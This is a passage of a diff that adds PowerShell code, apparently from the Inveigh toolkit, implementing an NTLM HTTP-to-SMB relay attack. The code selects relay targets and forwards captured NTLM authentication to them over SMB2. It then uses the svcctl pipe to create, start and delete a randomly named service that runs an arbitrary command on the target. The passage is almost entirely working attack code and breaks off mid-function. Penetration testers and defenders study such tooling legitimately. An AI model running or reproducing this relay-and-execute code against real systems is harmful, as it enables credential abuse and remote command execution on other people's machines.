+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selecting a random target") > $null
+
+ if($inveigh.target_list)
+ {
+ $SMB_target_results = Test-SMBTarget $inveigh.target_list $SessionLimitUnpriv
+ }
+ else
+ {
+ $targets = @()
+ $inveigh_enumerate.Count = $inveigh.enumerate.Count
+
+ for($i=0; $i -lt $hostname_encoded.Count; $i++)
+ {
+
+ if($inveigh_enumerate[$i].Hostname)
+ {
+ $targets += $inveigh_enumerate[$i].Hostname
+ }
+ elseif($inveigh_enumerate[$i].IP)
+ {
+ $targets += $inveigh_enumerate[$i].IP
+ }
+
+ }
+
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitUnpriv
+ }
+
+ $client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
+ if($target -and !$inveigh.relay_history_table.$SourceIP)
+ {
+ $inveigh.relay_history_table.Add($SourceIP,[Array]$target)
+ }
+ elseif($target -and $inveigh.relay_history_table.$SourceIP -notcontains $target)
+ {
+ $inveigh.relay_history_table.$SourceIP += $target
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ }
+
+ return $client,$target
+ }
+
+ function Invoke-SMBRelayChallenge
+ {
+ param ($client,$HTTP_request_bytes,$SMB_version,$SMB_process_ID)
+
+ try
+ {
+ $client_stream = $client.GetStream()
+ $client_receive = New-Object System.Byte[] 1024
+ $message_ID = 2
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ }
+
+ return $client_receive
+ }
+
+ function Invoke-SMBRelayResponse
+ {
+ param ($client,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$session_ID,$SMB_process_ID)
+
+ try
+ {
+ $client_receive = New-Object System.Byte[] 1024
+
+ if($client)
+ {
+ $SMB_relay_response_stream = $client.GetStream()
+ }
+
+ $message_ID = 3
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_relay_response_stream.Write($client_send,0,$client_send.Length) > $null
+ $SMB_relay_response_stream.Flush()
+ $SMB_relay_response_stream.Read($client_receive,0,$client_receive.Length) > $null
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($client_receive[12..15]) -eq '00-00-00-00'))
+ {
+ $SMB_relay_failed = $false
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication successful for $HTTP_username_full on $Target") > $null
+ }
+ else
+ {
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ $target_hostname = $inveigh.enumerate[$target_index].Hostname
+ $target_DNS_domain = $inveigh.enumerate[$target_index]."DNS Domain"
+
+ if($FailedLoginStrict -eq 'Y' -or ($HTTP_NTLM_domain_string -and ((!$target_hostname -or !$target_DNS_domain) -or ($target_hostname -and $target_DNS_domain -and $target_hostname -ne $target_DNS_domain))))
+ {
+
+ if(!$inveigh.relay_failed_login_table.ContainsKey($HTTP_username_full))
+ {
+ $inveigh.relay_failed_login_table.Add($HTTP_username_full,[Array]$target)
+ }
+ else
+ {
+ $inveigh.relay_failed_login_table.$HTTP_username_full += $target
+ }
+
+ }
+
+ $SMB_relay_failed = $true
+ $client.Close()
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ $SMB_relay_failed = $true
+ }
+
+ return $SMB_relay_failed
+ }
+
+ function Get-StatusPending
+ {
+ param ([Byte[]]$Status)
+
+ if([System.BitConverter]::ToString($Status) -eq '03-01-00-00')
+ {
+ $status_pending = $true
+ }
+
+ return $status_pending
+ }
+
+ function Invoke-SMBRelayExecute
+ {
+ param ($client,$SMB_version,$SMB_user_ID,$session_ID,$SMB_process_ID,$AccessCheck)
+
+ $client_receive = New-Object System.Byte[] 1024
+
+ if(!$Service)
+ {
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
+
+ if([Bool]($SMB_service.Length % 2))
+ {
+ $SMB_service_bytes += 0x00,0x00
+ }
+ else
+ {
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
+
+ }
+
+ }
+
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_}
+
+ if([Bool]($Command.Length % 2))
+ {
+ $SMBExec_command += '00-00'
+ }
+ else
+ {
+ $SMBExec_command += '00-00-00-00'
+ }
+
+ $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2)
+ $SMB_path = "\\" + $Target + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+ $client_stream = $client.GetStream()
+ $SMB_split_index = 4256
+ $stage = 'TreeConnect'
+ $message_ID = $inveigh.session_message_ID_table[$inveigh.session_count]
+
+ while ($stage -ne 'Exit')
+ {
+
+ try
+ {
+
+ switch ($stage)
+ {
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $client_receive[108..127]
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full has command execution privilege on $target") > $null
+
+ if($inveigh.domain_mapping_table.ContainsKey($HTTP_NTLM_domain_string))
+ {
+ $privileged_user = ($HTTP_NTLM_user_string + "@" + $inveigh.domain_mapping_table.$HTTP_NTLM_domain_string).ToUpper()
+ }
+ else
+ {
+ $privileged_user = $HTTP_username_full
+ }
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ [Array]$privileged_user_list = $inveigh.enumerate[$target_index].Privileged
+
+ if($privileged_user_list -notcontains $privileged_user)
+ {
+ $privileged_user_list += $privileged_user
+ $inveigh.enumerate[$target_index].Privileged = $privileged_user_list
+ }
+
+ if($AccessCheck)
+ {
+ $SMB_administrator = $true
+ $SMB_close_service_handle_stage = 2
+ $stage = 'CloseServiceHandle'
+ }
+ elseif($SCM_data.Length -lt $SMB_split_index)
+ {
+ $stage = 'CreateServiceW'
+ }
+ else
+ {
+ $stage = 'CreateServiceW_First'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($client_receive[128..131]) -eq '05-00-00-00')
+ {
+
+ if($Attack -notcontains 'Session')
+ {
+ $SMB_relay_failed = $true
+ }
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have command execution privilege on $Target") > $null
+ $SMB_service_manager_context_handle = $client_receive[108..127]
+ $SMB_close_service_handle_stage = 2
+ $message_ID++
+ $stage = 'CloseServiceHandle'
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'CloseRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Service $SMB_service deleted on $Target") > $null
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateRequest'
+ {
+ $tree_ID = $client_receive[40..43]
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateServiceW'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $message_ID++
+ $stage_current = $stage
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $message_ID++
+ $stage_current = $stage
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Command executed on $Target") > $null
+ }
+ elseif([System.BitConverter]::ToString($client_receive[108..111]) -eq '02-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Service $SMB_service failed to start on $Target") > $null
+ }
+
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $stage = 'SendReceive'
+ }
+
+ 'Logoff'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+ 'OpenSCManagerW'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $stage = 'SendReceive'
+ }
+
+ 'ReadRequest'
+ {
+ Start-Sleep -m 150
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $stage = 'SendReceive'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $client_receive[132..147]
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_RPC_data = New-PacketRPCBind 0x48,0x00 1 0x01 0x00,0x00 $named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'SendReceive'
+ {
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+
+ if(Get-StatusPending $client_receive[12..15])
+ {
+ $stage = 'StatusPending'
+ }
+ else
+ {
+ $stage = 'StatusReceived'
+ }
+
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($client_receive[132..135]) -eq '00-00-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Service $SMB_service created on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute command on $Target") > $null
+ $SMB_service_context_handle = $client_receive[112..131]
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $false $message_ID $SMB_process_ID $tree_ID $session_ID
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $stage = 'SendReceive'
+ }
+ elseif([System.BitConverter]::ToString($client_receive[132..135]) -eq '31-04-00-00')
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Service $SMB_service creation failed on $Target") > $null
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $client_stream.Read($client_receive,0,$client_receive.Length)
+
+ if([System.BitConverter]::ToString($client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $stage = $stage_next
+ }
+
+ }
+
+ 'StatusReceived'
+ {
+
+ switch ($stage_current)
+ {
+
+ 'CloseRequest'
+ {
+ $stage = 'TreeDisconnect'
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 2)
+ {
+ $stage = 'CloseServiceHandle'
+ }
+ else
+ {
+ $stage = 'CloseRequest'
+ }
+
+ }
+
+ 'CreateRequest'
+ {
+ $file_ID = $client_receive[132..147]
+ $stage = 'RPCBind'
+ }
+
+ 'CreateServiceW'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'StartServiceW'
+ }
+
+ 'DeleteServiceW'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'Logoff'
+ {
+ $stage = 'Exit'
+ }
+
+ 'OpenSCManagerW'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'CheckAccess'
+ }
+
+ 'ReadRequest'
+ {
+ $stage = $stage_next
+ }
+
+ 'RPCBind'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'OpenSCManagerW'
+ }
+
+ 'StartServiceW'
+ {
+ $stage = 'ReadRequest'
+ $stage_next = 'DeleteServiceW'
+ }
+
+ 'TreeConnect'
+ {
